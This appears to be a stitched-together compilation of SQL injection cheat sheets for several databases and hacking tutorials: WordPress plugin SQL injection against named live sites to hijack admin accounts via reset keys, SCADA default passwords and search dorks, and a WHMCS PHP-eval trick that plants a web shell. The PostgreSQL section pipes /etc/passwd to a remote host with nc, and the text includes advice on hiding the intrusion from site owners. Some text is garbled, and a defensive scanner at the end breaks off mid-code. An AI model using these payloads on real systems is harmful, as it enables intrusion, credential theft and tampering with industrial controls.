SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

List DBA Accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database
SELECT database()

List Databases
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv

List Columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

List Tables
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Find Tables From Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username'

Select Nth Row
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char
SELECT substr('abcd', 3, 1); # returns c

Bitwise AND
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

ASCII Value -> Char
SELECT char(65); # returns A

Char -> ASCII Value
SELECT ascii('A'); # returns 65

Casting
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);

String Concatenation
SELECT CONCAT('A','B'); # returns AB
SELECT CONCAT('A','B','C'); # returns ABC

If Statement
SELECT if(1=1,'foo','bar'); -- returns 'foo'

Case Statement
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

Avoiding Quotes
SELECT 0x414243; # returns ABC

Time Delay
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12

Make DNS Requests
Impossible?

Command ExecutionIf mysqld (0) AND (NOT A.attisdropped) AND (N.nspname ILIKE public)

List Tables
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)

Find Tables From Column Name
If you want to list all the table names that contain a column LIKE '%password%':
SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';

Select Nth Row
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; -- rows numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

Select Nth Char
SELECT substr('abcd', 3, 1); -- returns c

Bitwise AND
SELECT 6 & 2; -- returns 2
SELECT 6 & 1; -- returns 0

ASCII Value -> Char
SELECT chr(65);

Char -> ASCII Value
SELECT ascii('A');

Casting
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);

String Concatenation
SELECT 'A' || 'B'; -- returns AB

If Statement
IF statements only seem valid inside functions, so aren't much use for SQL injection. See CASE statement instead.

Case Statement
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A

Avoiding Quotes
SELECT CHR(65)||CHR(66); -- returns AB

Time Delay
SELECT pg_sleep(10); -- postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(10); -- priv, create your own sleep function. Taken from here.

Make DNS Requests
Generally not possible in postgres. However if contrib/dblink is installed (it isn't by default) it can be used to resolve hostnames (assuming you have DBA rights):
SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);
Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. ping pentestmonkey.net.

Command Execution
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; -- priv
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as postgres/pgsql OS-level user

Local File Access
CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd'; -- priv, can read files which are readable by postgres OS-level user
UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; -- get data back one row at a time
UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; -- get data back one row at a time
DROP TABLE mydata;
Write to a file:
CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ();
COPY mytable (mycol) TO '/tmp/test.php'; -- priv, write files as postgres OS-level user. Generally you won't be able to write to the web root, but it's always worth a try.
A priv user can also read/write files by mapping libc functions.

Hostname, IP Address
SELECT inet_server_addr(); -- returns db server IP address (or null if using local connection)
SELECT inet_server_port(); -- returns db server port (or null if using local connection)

Create Users
CREATE USER test1 PASSWORD 'pass1'; -- priv
CREATE USER test1 PASSWORD 'pass1' CREATEUSER; -- priv, grant some privs at the same time

Drop Users
DROP USER test1; -- priv

Make User DBA
ALTER USER test1 CREATEUSER CREATEDB; -- priv

Location of DB files
SELECT current_setting('data_directory'); -- priv
SELECT current_setting('hba_file'); -- priv

Default/System Databases
template0
template1

Ingres SQL Injection Cheat Sheet

Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier. Below are some tabulated notes on how to do many of the things you'd normally do via SQL injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres download page is here. This page will probably remain a work-in-progress for some time yet. I'll update it as I learn more.

This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Version
select dbmsinfo('_version');

Comments
SELECT 123; -- comment
select 123; /* comment */

Current User
select dbmsinfo('session_user');
select dbmsinfo('system_user');

List Users
First connect to iidbdb, then:
SELECT name, password FROM iiuser;
or
SELECT own FROM iidatabase;

Create Users
create user testuser with password = 'testuser'; -- priv

List Password Hashes
First connect to iidbdb, then:
select name, password from iiuser;

List Privileges
select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');

List DBA Accounts
TODO

Current Database
select dbmsinfo('database');

List Databases
SELECT name FROM iidatabase; -- connect to iidbdb

List Columns
select column_name, column_datatype, table_name, table_owner from iicolumns;

List Tables
select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != '$ingres';

Find Tables From Column Name
SELECT table_name, table_owner FROM iicolumns WHERE column_name = 'value';

Select Nth Row
Astoundingly, this doesn't seem to be possible! This is as close as you can get:
select top 10 blah from table;
select first 10 blah from table;

Select Nth Char
select substr('abc', 2, 1); -- returns b

Bitwise AND
The function bit_and exists, but seems hard to use. Here's an example of ANDing 3 and 5 together. The result is a byte type with value ?01:
select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

ASCII Value -> Char
TODO

Char -> ASCII Value
TODO (The ascii function exists, but doesn't seem to do what I'd expect.)

Casting
select cast(123 as varchar);
select cast(123 as integer);

String Concatenation
select 'abc' || 'def';

If Statement
TODO

Case Statement
TODO

Avoiding Quotes
TODO

Time Delay
??? See the Heavy Queries article for some ideas.

Make DNS Requests
TODO

Command Execution
Impossible?

Local File Access
TODO

Hostname, IP Address
SELECT dbmsinfo('ima_server');

Location of DB files
SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = 'value'; -- primary location of db
SELECT lname FROM iiextend WHERE dname = 'value'; -- extended location of db
SELECT area FROM iilocations where lname = 'value'; -- all areas (i.e. directories) linked with a location

Default/System Databases
SELECT name FROM iidatabase WHERE own = '$ingres'; -- connect to iidbdb

Installing Locally
The Ingres database can be downloaded for free from http://esd.ingres.com/
A pre-built Linux-based Ingres Database Server can be downloaded from http://www.vmware.com/appliances/directory/832

Database Client
TODO. There is a client called sql which can be used for local connections (at least) in the database server package above.

Logging in from command line
$ su - ingres
$ sql iidbdb
* select dbmsinfo('_version');
\go

Identifying on the network
TODO

The following areas are interesting enough to include on this page, but I haven't researched them for other databases:

Batching Queries Allowed?
Not via DBI in PERL. Subsequent statements seem to get ignored:
select blah from table where foo = 1; select 'doesnt matter this is ignored';

FROM clause mandated in SELECTs?
No. You don't need to select from dual or anything. The following is legal:
select 1;

UNION supported
Yes. Nothing tricky here. The following is legal:
select 1 union select 2;

Enumerate Tables Privs
select table_name, permit_user, permit_type from iiaccess;

Length of a string
select length('abc'); -- returns 3

Roles and passwords
First you need to connect to iidbdb, then:
select roleid, rolepass from iirole;

List Database Procedures
First you need to connect to iidbdb, then:
select dbp_name, dbp_owner from iiprocedure;

Create Users + Granting Privs
First you need to connect to iidbdb, then:
create user pm with password = 'password';
grant all on current installation to pm;

DB2 SQL Injection Cheat Sheet

Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience. When you do find one, though, it pays to be prepared. Below are some tabulated notes on how to do many of the things you'd normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.

This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with priv at the end of the query.

Version
select versionnumber, version_timestamp from sysibm.sysversions;

Comments
select blah from foo; -- comment like this

Current User
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;

List Users
N/A (I think DB2 uses OS-level user accounts for authentication.)
Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

List Password Hashes
N/A (I think DB2 uses OS-level user accounts for authentication.)

List Privileges
select * from syscat.tabauth; -- privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select * from SYSIBM.SYSUSERAUTH; -- list db2 system privileges

List DBA Accounts
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G';

Current Database
select current server from sysibm.sysdummy1;

List Databases
SELECT schemaname FROM syscat.schemata;

List Columns
select name, tbname, coltype from sysibm.syscolumns;

List Tables
select name from sysibm.systables;

Find Tables From Column Name
select tbname from sysibm.syscolumns where name='username';

Select Nth Row
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

Select Nth Char
SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b

Bitwise AND
This page seems to indicate that DB2 has no support for bitwise operators!

ASCII Value -> Char
select chr(65) from sysibm.sysdummy1; -- returns A

Char -> ASCII Value
select ascii('A') from sysibm.sysdummy1; -- returns 65

Casting
SELECT cast(123 as integer) FROM sysibm.sysdummy1;
SELECT cast('1' as char) FROM sysibm.sysdummy1;

String Concatenation
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns abc
select 'a' || 'b' from sysibm.sysdummy1; -- returns ab

Informix SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into Informix databases. Below are some tabulated notes on how to do many of the things you'd normally do via SQL injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for Windows. The Informix download page is here.

This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Version
SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows, U=32-bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit Unix

Comments
select 1 FROM systables WHERE tabid = 1; -- comment

Current User
SELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;

List Users
select username, usertype, password from sysusers;

List Password Hashes
TODO

List Privileges
select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; -- which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users

List DBA Accounts
TODO

Current Database
SELECT DBSERVERNAME FROM systables where tabid = 1; -- server name

List Databases
select name, owner from sysdatabases;

List Columns
select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;

List Tables
select tabname, owner FROM systables;
select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;

List Stored Procedures
select procname, owner FROM sysprocedures;

Find Tables From Column Name
select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like '%pass%';

Select Nth Row
select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; -- selects the 10th row

Select Nth Char
SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; -- returns C

Bitwise AND
select bitand(6, 1) from systables where tabid = 1; -- returns 0
select bitand(6, 2) from systables where tabid = 1; -- returns 2

ASCII Value -> Char
TODO

Char -> ASCII Value
select ascii('A') from systables where tabid = 1;

Casting
select cast(123 as integer) from systables where tabid = 1;
select cast('1' as char) from systables where tabid = 1;

String Concatenation
SELECT 'A' || 'B' FROM systables where tabid = 1; -- returns AB
SELECT concat('A', 'B') FROM systables where tabid = 1; -- returns AB

String Length
SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;

If Statement
TODO

Case Statement
select tabid, case when tabid>10 then 'High' else 'Low' end from systables;

Avoiding Quotes
TODO

Time Delay
TODO

Make DNS Requests
TODO

Command Execution
TODO

Local File Access
TODO

Hostname, IP Address
SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; -- hostname

Location of DB files
TODO

Default/System Databases
These are the system databases:
sysmaster
sysadmin*
sysuser*
sysutils*
* = don't seem to contain anything / don't allow reading

Installing Locally
You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.

Database Client
There's a database client SDK available, but I couldn't get the demo client working. I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (emerge dev-java/jdbc-informix on Gentoo).

Logging in from command line
If you get local admin rights on a Windows box and have a GUI logon: Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various environment variables set properly. Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.

The following were set on my test system. This may help if you get command line access but can't get a GUI (you'll need to change testservername):
set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50
set INFORMIXSERVER=testservername
set ONCONFIG=ONCONFIG.testservername
set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;C:\Program Files\IBM\Informix\Client-SDK\bin;C:\Program Files\ibm\gsk7\bin;C:\Program Files\ibm\gsk7\lib
set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\jdbc.jar;
set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp
set CLIENT_LOCALE=EN_US.CP1252
set DB_LOCALE=EN_US.8859-1
set SERVER_LOCALE=EN_US.CP1252
set DBLANG=EN_US.CP1252
mode con codepage select=1252

Identifying on the network
My default installation listened on two TCP ports: 9088 and 9099. When I created a new server name, this listened on 1526/TCP by default. Nmap 4.76 didn't identify these ports as Informix:
$ sudo nmap -sS -sV 10.0.0.1 -p- -v --version-all
1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown
TODO: How would we identify Informix listening on the network?

WordPress Hacking Tricks

I. Hacking WordPress (without cracking the hashes)

You cannot exploit the latest version of WordPress with this: 3.4.2, which was released on 6th September 2012.

Things you need:
1) Any WordPress SQLi dork (you can get it from exploit-db.com)
2) Knowledge of SQLi (because this thread is not about SQLi)

Let's start.

1) My dork. There are a number of SQLi exploits in different plugins and themes of WordPress. The exploit I'm picking is in one of the plugins called Wp-FacebookConnect, and the Google dork for it is:
Code : inurl:"/?fbconnect_action=myhome"
Now paste this code in google.com (one of my best friends) and you will see a number of vulnerable websites.

2) The website I'm going to use here is:
Code : http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2
> Here the parameter userid is vulnerable to SQLi.
> So let's see what we can get from the database.
> I'm going to change the above URL to this:
Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email),7,8,9,10,11,12+from+wp_users--
> Now you can see we got the username with the email id.
> Now if I change the above URL to this:
Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--
> I'm going to get the username and the hashed password.
> (Point to be noted here: I'm using concat; you can also use group_concat to get all the users. Again, how you use SQLi is down to your own knowledge.)
> Now, we all know that WordPress hashes belong to the category MD5(wordpress) (different from simple MD5) and are very hard to crack.
> But if you're mad, you should think out of the box. So now follow the steps:
a) Go to the login page of the WordPress site. In my case that would be:
Code : http://masaru.ikeda.me/wp-login.php
b) Click on "Lost your password?"
c) Now WordPress will ask for the username or email for which I want to reset the password. In my case that is 'masaru', so go ahead and enter the username.
d) Now look closely: it says "Check your e-mail for the confirmation link."
e) What WordPress actually does is send an activation key to the email address of that user, and it sets the value of the activation key in the database as well. What you have to do is just get that key.
f) So now I'm going to change my URL to this, to get the activation key:
Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--
NOTE: We got the activation key here; you should note it down somewhere.
g) Now, finally, all we have to do is reset the password without going to the email address. For that I'm going to add this to my URL:
Code : wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE
I'm going to replace KEYHERE with the activation key I got, and USER NAME HERE with the username, which in my case is 'masaru'. So my URL will be:
Code : http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru
and VOILA, WordPress will ask you for your new password. Now go to the login page again and try the new password, and there you go: you've got access to the panel. Now you know how to shell the WordPress site, don't you?

Trick for those who are actually MAD:
1) To check quickly if a website is using the latest version 3.4.2 or a previous version: go to the login page and see if there is an option there to go back to the main page of the blog, like in my case. If you don't see this option then it is 3.4.2. This trick is not legit; I figured it out and it is working for me.
2) Once you have shelled the website:
> Get the database details.
> Use any database connector.
> Go to the table wp_user, and in the column wp_pass replace the hash with the one you got in the very beginning, the actual hash of the admin. Now the password will be again what it was before, as if nothing happened; the admin will never know what hit 'em.

Now, in the latest version, 3.4.2, what actually happens is that after confirming the activation key WordPress doesn't let you choose a new password; rather, it sends you a random password to your email.

How To Hack WordPress Websites using SQL Injection

What is WordPress?
WordPress is a free and open source blogging tool and a content management system (CMS) based on PHP and MySQL. It has many features including a plug-in architecture and a template system. WordPress is currently the most popular blogging system in use on the Web. It was first released on May 27, 2003, by founder Matt Mullenweg.

Now let's move on to hacking a website. I have used here the all-video-gallery (WordPress plugin) SQLi vulnerability.

1> First we will find a target using a Google dork: inurl:all-video-gallery/config.php?vid=


2> Open any website. In my case it's juangrial.com.

3> Now let's do a SQL injection. Copy the exploit code, hit enter, then see the magic :)
Exploit code for finding username & password: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--

You can also try this; both work the same.
Exploit code for finding username & email: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--

4> We got the admin email. Now let's reset it.

For that go to: http://site.com/wp-admin or https://site.com/wp-login.php, then click on "Lost Password".

5> Enter the email we got in the earlier steps.

6> Now come back and go to the activation table. Exploit code for the activation key: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--

7> Yeah! We got what we need; now let's change the admin password. Go to: http://site.com/wp-login.php?action=rp&key=resetkey&login=username

8> Now open http://site.com/wp-admin and log in with the new password. xD
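The reset trick in the two WordPress write-ups above works because user_activation_key sits in clear in wp_users, so whoever can read that row through SQL injection can finish the reset themselves. As an added example (not WordPress code and not from this page), here is the storage pattern that closes that gap: keep only a salted hash of the key, compare in constant time, expire it and consume it on use. The in-memory user store, the one-hour lifetime and the function names are assumptions.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional

KEY_BYTES = 20                # entropy of the reset key sent to the user
KEY_LIFETIME_SECONDS = 3600   # assumed policy: a reset link is good for one hour
PBKDF2_ROUNDS = 100_000

# Assumed user store, login -> row. It stands in for wp_users: only a salted
# hash of the reset key is kept, never the key itself, so a row read through
# SQL injection does not give the attacker a working reset link.
USERS: Dict[str, dict] = {}


def _hash_key(login: str, key: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256 over login:key; binding the login stops a hash
    being moved from one account's row to another's."""
    return hashlib.pbkdf2_hmac("sha256", f"{login}:{key}".encode(), salt, PBKDF2_ROUNDS)


def issue_reset_key(login: str, now: Optional[float] = None) -> str:
    """Start a password reset: store the hash, return the key for the e-mail."""
    now = time.time() if now is None else now
    key = secrets.token_urlsafe(KEY_BYTES)
    salt = secrets.token_bytes(16)
    USERS[login] = {
        "reset_salt": salt,
        "reset_hash": _hash_key(login, key, salt),
        "reset_issued": now,
    }
    return key


def check_reset_key(login: str, key: str, now: Optional[float] = None) -> bool:
    """Validate the (login, key) pair from a reset link: single use, time
    limited, constant-time comparison so the check itself is not an oracle."""
    now = time.time() if now is None else now
    row = USERS.get(login)
    if row is None or row["reset_hash"] is None:
        return False
    if now - row["reset_issued"] > KEY_LIFETIME_SECONDS:
        return False
    candidate = _hash_key(login, key, row["reset_salt"])
    if not hmac.compare_digest(candidate, row["reset_hash"]):
        return False
    row["reset_hash"] = None   # consume the key: a captured link cannot be replayed
    return True


def stored_hash_hex(login: str) -> str:
    """What a SQL injection reading the users table would see for this login."""
    stored = USERS[login]["reset_hash"]
    return stored.hex() if stored else ""


if __name__ == "__main__":
    key = issue_reset_key("admin")
    print("stored in DB:", stored_hash_hex("admin"))
    print("leaked value works as key?", check_reset_key("admin", stored_hash_hex("admin")))
    print("real key works?", check_reset_key("admin", key))
```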

DNS Zone Transfer Vulnerability Exploit

Scan the website with Acunetix Web Vulnerability Scanner. If you get a DNS zone transfer vulnerability:

Open a command prompt (Run > cmd), start nslookup, point it at the domain's name server, set the record type, then list the zone:
C:\> nslookup
> server <name server of the target domain>
> set type=any
> ls -d <target domain>

Hacking SCADA Systems

With the discovery of Stuxnet and all the subsequent interest in industrial control systems, it's worthwhile to learn a bit about how to exploit these for our own purposes. For now it's a copy-paste of various information on ICS products. Eventually I will rewrite it as a fluent tutorial, but until then you can use this article as a starting point in your own research.

Contents:
- Terminology
- Default Passwords
- Google Dorks
- Vulnerabilities and Other Resources

Terminology:
PLC: Programmable Logic Controller
RTU: Remote Terminal Unit
HMI: Human-Machine Interface

Default Passwords:
These should always be your first try if you come across an HMI listed. Because these systems have only recently received much attention, many of these HMIs still have their defaults. These can be accessed using a web panel, telnet, or VNC. Links to support documents have been provided to familiarize yourself with these systems.
Schneider Electrics :pcfactory:pcfactoryloader:fwdownloadntpupdate:ntpupdatesysdiag:factorycast@schneidertest:testingpwUSER:USERUSER:USER webserver:webpagesfdrusers:sresurdfnic2212:poiuypoiuynimrohs2212:qwertyqwertynip2212:fcsdfcsdftpuser:ftpusernoe77111_v500:RcSyyebczSAUTCSE:RybQRceeSdAUT_CSE:cQdd9debeztarget:RcQbRbzRycSiemens Simatic :Administrator:100 Siemens WinCC :WinCCConnect:2WSXcderWinCCAdmin:2WSXcderWAGO :admin:wago

Google Dorks:
These will be added to as I go along, but here are just a couple you can try out to search for HMIs.
inurl:/plc/webvisu.htm
"Miniweb on" "Control Functions" -filetype:pdf

Vulnerabilities and Other Resources
Vulnerabilities in some SCADA server softwares
Metasploit Modules for SCADA-related Vulnerabilities
SIMATIC HMI panels - some default Simatic HMIs you can play around with

WHMCS Hacking with Submit Ticket exploit

Hi Mates!

Today we are going to learn how to hack WHMCS, or you can say its submit ticket exploit, through which we will get the cPanel username and password of the hosting panel and of the website hosted on that WHMCS. Let's start.

Step 1: Get a website which provides hosting and find the "Submit Ticket" option.
Step 2: Now open the Submit Ticket option and click on the sales department.

Step 3: Now we have to fill in the following info: name, email address, urgency (put any random info in these fields); the main thing is the subject field.

Fill this code in the subject field:

{php}evaL(base64_decode('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'));exit;{/php}______________________________________________________________________________

Then scroll down, fill in the captcha and click the submit button.

We will be redirected to the next page, where it will show the cPanel username and password. Boom! You have the cPanel usernames and passwords of the hosting panel and of the websites hosted on that server. If you are lucky, you may also get the FTP and SMTP passwords too!

OK, that was all about the cPanel, FTP and SMTP passwords. If the WHMCS doesn't have any website hosted on it you won't get anything. Then? Don't be sad :) We have one more trick, and this will help you upload a shell on the WHMCS website. How? Let's move on :) Come back to the submit ticket page and put any random info in the email, name and urgency fields; the main step is to put the PHP code in the subject field. This time we are going to put PHP code which, if it gets executed successfully, will give us an uploader on the website through which we will be able to upload a shell. So let's start.

Fill in any random info in the other fields and put this PHP code in the subject field:

{php}eval(base64_decode('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'));exit;{/php}______________________________________________________________________________

Fill in the captcha and click enter. Now, first of all, have a look at the submit ticket URL, for example http://www.website.com/client/submitticket.php. To get the uploader, replace submitticket.php with downloads/indexx.php (remember, it's indexx.php: when the code executes it will create indexx.php and its uploader). So open the URL http://www.website.com/client/downloads/indexx.php and you will see a file upload option!

Browse to the shell and click upload. After uploading the shell, open the URL http://www.website.com/client/downloads/shell_name.php. Hell yeah, owned :D
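As a defender-side counterpart to the SQL injection cheat sheets above and to the WHMCS ticket-subject trick just described, here is an added example, not code from the original page, that scans request records for the signatures those sections rely on (UNION SELECT, pg_sleep, dblink/COPY, dbmsinfo/DBINFO/sysdummy1 fingerprints, wp_users dumps and Smarty {php} tags). The tab-separated log layout and the sample traffic are constructed for the example; hostnames and addresses in it are made up.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import Dict, List

# Signatures taken from the cheat sheets and the WHMCS ticket trick above.
# Each regex is applied to the decoded, lower-cased value of one request field.
SIGNATURES = [
    ("union-based SQLi",      re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("boolean tautology",     re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b")),
    ("postgres time delay",   re.compile(r"\bpg_sleep\s*\(")),
    ("postgres dblink/COPY",  re.compile(r"\bdblink\s*\(|\bcopy\s+\w+\s+(from|to)\b")),
    ("ingres fingerprint",    re.compile(r"\bdbmsinfo\s*\(")),
    ("informix fingerprint",  re.compile(r"\bdbinfo\s*\(|\bfrom\s+systables\b")),
    ("db2 fingerprint",       re.compile(r"\bsysibm\.sysdummy1\b")),
    ("wordpress user dump",   re.compile(r"\bfrom\s+wp_users\b|\buser_activation_key\b")),
    ("smarty {php} tag",      re.compile(r"\{\s*/?\s*php\s*\}")),
]


@dataclass(frozen=True)
class Finding:
    line_no: int     # 1-based line in the log
    field: str       # query or form parameter that carried the payload
    signature: str   # name from SIGNATURES


def normalize(value: str) -> str:
    """Undo the encodings used to smuggle payloads ('+' for space, %xx),
    applied twice so a double-encoded payload still decodes."""
    for _ in range(2):
        value = urllib.parse.unquote_plus(value)
    return value.lower()


def fields_of(url: str, body: str) -> Dict[str, List[str]]:
    """Collect the query-string and form-body parameters of one request."""
    query = urllib.parse.urlsplit(url).query
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    if body and body != "-":
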